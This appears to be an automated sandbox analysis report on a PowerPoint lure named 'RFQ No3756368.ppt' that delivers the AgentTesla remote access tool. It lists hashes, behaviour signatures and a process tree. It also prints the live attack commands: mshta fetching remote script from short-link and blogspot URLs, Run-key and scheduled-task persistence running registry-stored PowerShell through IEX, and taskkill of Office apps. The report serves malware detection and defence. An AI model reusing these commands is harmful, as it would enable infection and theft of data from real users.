Analysis
-
max time kernel
106s -
max time network
133s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
22-04-2021 07:21
Static task
static1
Behavioral task
behavioral1
Sample
RFQ No3756368.ppt
Resource
win7v20210408
Behavioral task
behavioral2
Sample
RFQ No3756368.ppt
Resource
win10v20210410
General
-
Target
RFQ No3756368.ppt
-
Size
78KB
-
MD5
4b485ae386bfa68a2eeac2dc35bda606
-
SHA1
8086ec71e34fd18a1a8e3e20721bc466caf3cda4
-
SHA256
99b84223a505faa4dcd483e6e925dddfe5a890b41aa92b5e4ef5239a26036075
-
SHA512
7918aedf847172a8dfed81931ebe5247a627922d5042d6a10799089dd8bb711a1a8f4dc5301e5b65a0f8a27d11f8d815b7d615bb157854a70d1b5a93e8cb09d5
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exepowershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 812 3892 mshta.exe POWERPNT.EXE Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2076 4020 powershell.exe -
AgentTesla Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3892-187-0x00000000004375FE-mapping.dmp family_agenttesla -
Blocklisted process makes network request 10 IoCs
Processes:
mshta.exepowershell.exeflow pid process 17 812 mshta.exe 19 812 mshta.exe 21 812 mshta.exe 23 812 mshta.exe 25 812 mshta.exe 29 812 mshta.exe 32 812 mshta.exe 37 812 mshta.exe 39 812 mshta.exe 45 2076 powershell.exe -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
mshta.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"mshta\"\"http://1230948%[email protected]/p/47.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "\"mshta\"\"http://1230948%[email protected]/p/47.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\replcia = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).nasdnasndnad)|IEX\"\", 0 : window.close\")" mshta.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).MSOFFICELO)|IEX\"\", 0 : window.close\")" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "\"mshta\"\"http://1230948%[email protected]/p/47.html\"" mshta.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2076 set thread context of 3892 2076 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2588 812 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3704 taskkill.exe 2108 taskkill.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 3892 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 30 IoCs
Processes:
powershell.exeWerFault.exeaspnet_compiler.exepid process 2076 powershell.exe 2076 powershell.exe 2588 WerFault.exe 2588 WerFault.exe 2588 WerFault.exe 2588 WerFault.exe 2588 WerFault.exe 2588 WerFault.exe 2588 WerFault.exe 2588 WerFault.exe 2588 WerFault.exe 2588 WerFault.exe 2588 WerFault.exe 2588 WerFault.exe 2588 WerFault.exe 2588 WerFault.exe 2588 WerFault.exe 2076 powershell.exe 2076 powershell.exe 2076 powershell.exe 2076 powershell.exe 2076 powershell.exe 2076 powershell.exe 2076 powershell.exe 2076 powershell.exe 2076 powershell.exe 2076 powershell.exe 2076 powershell.exe 3892 aspnet_compiler.exe 3892 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 47 IoCs
Processes:
powershell.exetaskkill.exetaskkill.exeWerFault.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 2076 powershell.exe Token: SeDebugPrivilege 3704 taskkill.exe Token: SeDebugPrivilege 2108 taskkill.exe Token: SeDebugPrivilege 2588 WerFault.exe Token: SeIncreaseQuotaPrivilege 2076 powershell.exe Token: SeSecurityPrivilege 2076 powershell.exe Token: SeTakeOwnershipPrivilege 2076 powershell.exe Token: SeLoadDriverPrivilege 2076 powershell.exe Token: SeSystemProfilePrivilege 2076 powershell.exe Token: SeSystemtimePrivilege 2076 powershell.exe Token: SeProfSingleProcessPrivilege 2076 powershell.exe Token: SeIncBasePriorityPrivilege 2076 powershell.exe Token: SeCreatePagefilePrivilege 2076 powershell.exe Token: SeBackupPrivilege 2076 powershell.exe Token: SeRestorePrivilege 2076 powershell.exe Token: SeShutdownPrivilege 2076 powershell.exe Token: SeDebugPrivilege 2076 powershell.exe Token: SeSystemEnvironmentPrivilege 2076 powershell.exe Token: SeRemoteShutdownPrivilege 2076 powershell.exe Token: SeUndockPrivilege 2076 powershell.exe Token: SeManageVolumePrivilege 2076 powershell.exe Token: 33 2076 powershell.exe Token: 34 2076 powershell.exe Token: 35 2076 powershell.exe Token: 36 2076 powershell.exe Token: SeIncreaseQuotaPrivilege 2076 powershell.exe Token: SeSecurityPrivilege 2076 powershell.exe Token: SeTakeOwnershipPrivilege 2076 powershell.exe Token: SeLoadDriverPrivilege 2076 powershell.exe Token: SeSystemProfilePrivilege 2076 powershell.exe Token: SeSystemtimePrivilege 2076 powershell.exe Token: SeProfSingleProcessPrivilege 2076 powershell.exe Token: SeIncBasePriorityPrivilege 2076 powershell.exe Token: SeCreatePagefilePrivilege 2076 powershell.exe Token: SeBackupPrivilege 2076 powershell.exe Token: SeRestorePrivilege 2076 powershell.exe Token: SeShutdownPrivilege 2076 powershell.exe Token: SeDebugPrivilege 2076 powershell.exe Token: SeSystemEnvironmentPrivilege 2076 powershell.exe Token: SeRemoteShutdownPrivilege 2076 powershell.exe Token: SeUndockPrivilege 2076 powershell.exe Token: SeManageVolumePrivilege 2076 powershell.exe Token: 33 2076 powershell.exe Token: 34 2076 powershell.exe Token: 35 2076 powershell.exe Token: 36 2076 powershell.exe Token: SeDebugPrivilege 3892 aspnet_compiler.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
POWERPNT.EXEaspnet_compiler.exepid process 3892 POWERPNT.EXE 3892 POWERPNT.EXE 3892 POWERPNT.EXE 3892 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
POWERPNT.EXEmshta.exepowershell.exedescription pid process target process PID 3892 wrote to memory of 812 3892 POWERPNT.EXE mshta.exe PID 3892 wrote to memory of 812 3892 POWERPNT.EXE mshta.exe PID 812 wrote to memory of 2668 812 mshta.exe schtasks.exe PID 812 wrote to memory of 2668 812 mshta.exe schtasks.exe PID 812 wrote to memory of 3704 812 mshta.exe taskkill.exe PID 812 wrote to memory of 3704 812 mshta.exe taskkill.exe PID 812 wrote to memory of 2108 812 mshta.exe taskkill.exe PID 812 wrote to memory of 2108 812 mshta.exe taskkill.exe PID 2076 wrote to memory of 2064 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 2064 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 2064 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 3312 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 3312 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 3312 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 192 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 192 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 192 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 1900 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 1900 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 1900 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 2056 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 2056 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 2056 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 3892 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 3892 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 3892 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 3892 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 3892 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 3892 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 3892 2076 powershell.exe aspnet_compiler.exe PID 2076 wrote to memory of 3892 2076 powershell.exe aspnet_compiler.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\RFQ No3756368.ppt" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\mshta.exemshta http://www.j.mp/asdaksdjqwoddaskdajk2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%[email protected]/p/47.html""\"", 0 : window.close"\")3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 812 -s 28363⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noexit ((gp HKCU:\Software).MSOFFICELO)|IEX1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/812-179-0x0000000000000000-mapping.dmp
-
memory/2076-184-0x0000012B7C0C3000-0x0000012B7C0C5000-memory.dmpFilesize
8KB
-
memory/2076-183-0x0000012B7C0C0000-0x0000012B7C0C2000-memory.dmpFilesize
8KB
-
memory/2076-186-0x0000012B7C0C8000-0x0000012B7C0C9000-memory.dmpFilesize
4KB
-
memory/2076-185-0x0000012B7C0C6000-0x0000012B7C0C8000-memory.dmpFilesize
8KB
-
memory/2108-182-0x0000000000000000-mapping.dmp
-
memory/2668-180-0x0000000000000000-mapping.dmp
-
memory/3704-181-0x0000000000000000-mapping.dmp
-
memory/3892-122-0x00007FFC0FAC0000-0x00007FFC10BAE000-memory.dmpFilesize
16.9MB
-
memory/3892-189-0x0000000005440000-0x000000000593E000-memory.dmpFilesize
5.0MB
-
memory/3892-117-0x00007FFBF09B0000-0x00007FFBF09C0000-memory.dmpFilesize
64KB
-
memory/3892-119-0x00007FFBF09B0000-0x00007FFBF09C0000-memory.dmpFilesize
64KB
-
memory/3892-114-0x00007FFBF09B0000-0x00007FFBF09C0000-memory.dmpFilesize
64KB
-
memory/3892-115-0x00007FFBF09B0000-0x00007FFBF09C0000-memory.dmpFilesize
64KB
-
memory/3892-123-0x00007FFC0A880000-0x00007FFC0C775000-memory.dmpFilesize
31.0MB
-
memory/3892-116-0x00007FFBF09B0000-0x00007FFBF09C0000-memory.dmpFilesize
64KB
-
memory/3892-187-0x00000000004375FE-mapping.dmp
-
memory/3892-188-0x0000000005440000-0x000000000593E000-memory.dmpFilesize
5.0MB
-
memory/3892-118-0x00007FFC13460000-0x00007FFC1503D000-memory.dmpFilesize
27.9MB